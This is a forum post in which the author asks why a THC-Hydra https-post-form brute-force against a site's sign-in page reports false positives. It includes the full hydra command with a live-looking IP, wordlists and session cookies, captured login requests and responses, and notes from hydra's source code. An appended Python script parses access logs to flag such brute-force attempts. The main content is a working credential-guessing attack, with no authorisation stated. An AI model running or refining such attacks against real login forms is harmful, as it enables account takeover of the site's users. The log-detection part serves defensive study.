Problems with THC-HYDRA Giving False Positive Passwords

Sep 18, 2018 03:29 AM

hydra -L userdummy.txt -P passdummy.txt -vV 104.20.113.15 https-post-form "/website.com/sign-in:email=^USER^&password=^PASS^&login=Log+in+to+your+account:F=incorrect.:C= _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; http_referer=%2Fsign-in; _ga=GA1.2.1543913319.1536632638; _gid=GA1.2.1875996076.1536632638; _gat=1"

This is my full command using the cookie from the request listed below.

POST /sign-in HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: website.com/sign-in
Cookie: _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; http_referer=%2Fsign-in; _ga=GA1.2.1543913319.1536632638; _gid=GA1.2.1875996076.1536632638; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

email=username&password=password&login=Log+in+to+your+account

This request is a recording of the request form using an invalid username and password. When I use a correct password and username, the only thing that has changed has been the end of the cookie "_gat=1". It is not there when using a valid username and password. I have tried using the cookie from a successful login and changed the "F=" to an "S=" in my hydra command. The result is as follows: "1 of 1 target completed, 0 valid passwords found". And I get "1 of 1 target successfully completed, 24 valid passwords found" as if hydra is not seeing the failure message "email or password are incorrect" or the failed request cookie "_cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; http_referer=%2Fsign-in; _ga=GA1.2.1543913319.1536632638; _gid=GA1.2.1875996076.1536632638; _gat=1".

For your information, the hydra command breaks down like this: hydra (calling hydra) -L (use this username list) userlist.txt -P (use this pass list) passlist.txt -vV (verbose) 127.0.0.0 (host ip) https-get-form (method) "x:xxx:xxx" (host url:email/pass parameters:failure message or success message:optional parameter:optional parameter (cookie or header)).

I have tried several variants, including using the header "200 OK" as the optional parameter, in combination and without combination with the cookie. I've tried not using either; there must be something wrong with the failure parameter. I think hydra is struggling to differentiate a valid login from a failed one, therefore either giving me all valid passwords or all failed. This is a copy of the request form using a valid login and valid password. As you can see, "_gat=1" has disappeared from the cookie and should work to help hydra differentiate between a valid and a failed request.

POST /sign-in HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: website.com/sign-in
Cookie: _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; http_referer=%2Fsign-in; _ga=GA1.2.1543913319.1536632638; _gid=GA1.2.1875996076.1536632638
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

email=iforgot&password=iforgot&login=Log+in+to+your+account

This is the response to that valid request:

HTTP/1.1 302 Moved Temporarily
Date: Tue, 11 Sep 2018 02:46:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: http_referer=%2Fsign-in; expires=Tue, 11-Sep-2018 03:46:33 GMT; path=/; domain=.website.com
Set-Cookie: loginkey=0067aa09e8bc1b2d92dece7acee917cc; expires=Tue, 18-Sep-2018 02:46:33 GMT; path=/; domain=.website.com
Location: /
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4586cdfa5b308d1d-PDX
Content-Length: 0

I have tried using the loginkey as the cookie for the success message. Doesn't work.

Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: http_referer=%2Fsign-in; expires=Tue, 11-Sep-2018 03:24:37 GMT; path=/; domain=.website.com
Set-Cookie: return_url=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4586add9adba8d23-PDX
Content-Length: 9156

This is the response to a request using an invalid password and username. I have tried using the return_url cookie as the failure parameter, but it doesn't work either.

I started combing through the source code for hydra to try to find an answer to my problem. I learned that if you escape your colons, then hydra will not count it as a separate parameter (ex: Cookie//:); I tried that with no success. I also learned that "Set-Cookie" is in the source code for hydra and therefore it should be able to read Set-Cookie: XXXX as a valid parameter. I understand that on websites like this no one will do the work for you, and I'm not looking only for a straightforward answer, but more for guidance to find the answer to my problem. Thank you all.
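The same success/failure distinction the post is chasing (a 302 redirect to / on a valid login, the 9156-byte form page with a 200 on an invalid one) is also what such a run leaves behind in the web server's access log. As an added example, not from the original post or from hydra, the script below parses constructed Common Log Format lines, counts POST /sign-in outcomes per source address and flags a burst of failures followed by a success; the log format and the failure threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not taken from the original post).
# A failed login re-renders the form (200, 9156-byte body); a successful
# login answers 302 with an empty body, matching the responses shown above.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Sep/2018:02:40:01 +0000] "POST /sign-in HTTP/1.1" 200 9156
203.0.113.7 - - [11/Sep/2018:02:40:02 +0000] "POST /sign-in HTTP/1.1" 200 9156
203.0.113.7 - - [11/Sep/2018:02:40:02 +0000] "POST /sign-in HTTP/1.1" 200 9156
203.0.113.7 - - [11/Sep/2018:02:40:03 +0000] "POST /sign-in HTTP/1.1" 200 9156
203.0.113.7 - - [11/Sep/2018:02:40:03 +0000] "POST /sign-in HTTP/1.1" 200 9156
203.0.113.7 - - [11/Sep/2018:02:40:04 +0000] "POST /sign-in HTTP/1.1" 302 0
198.51.100.9 - - [11/Sep/2018:02:41:10 +0000] "GET /sign-in HTTP/1.1" 200 9156
198.51.100.9 - - [11/Sep/2018:02:41:25 +0000] "POST /sign-in HTTP/1.1" 200 9156
198.51.100.9 - - [11/Sep/2018:02:41:40 +0000] "POST /sign-in HTTP/1.1" 302 0
"""

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

def parse_line(line):
    # Returns the named fields of one log line, or None if it does not parse.
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def summarize_signin(log_text, path="/sign-in"):
    # Per source IP: failed (200) and successful (302) POSTs to the login path,
    # plus whether a success came only after earlier failures from that IP.
    stats = defaultdict(lambda: {"failures": 0, "successes": 0, "success_after_failures": False})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec or rec["method"] != "POST" or rec["path"] != path:
            continue
        s = stats[rec["ip"]]
        if rec["status"] == "200":
            s["failures"] += 1
        elif rec["status"] == "302":
            s["successes"] += 1
            if s["failures"] > 0:
                s["success_after_failures"] = True
    return dict(stats)

def flag_bruteforce(log_text, fail_threshold=5):
    # IPs whose failed-login count reaches the threshold (an assumed tuning value).
    stats = summarize_signin(log_text)
    return sorted(ip for ip, s in stats.items() if s["failures"] >= fail_threshold)
```

The `success_after_failures` flag is the more useful signal: a run of form re-renders from one address that ends in a redirect is what a guessed password looks like from the server side, independent of what the client tool reported.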
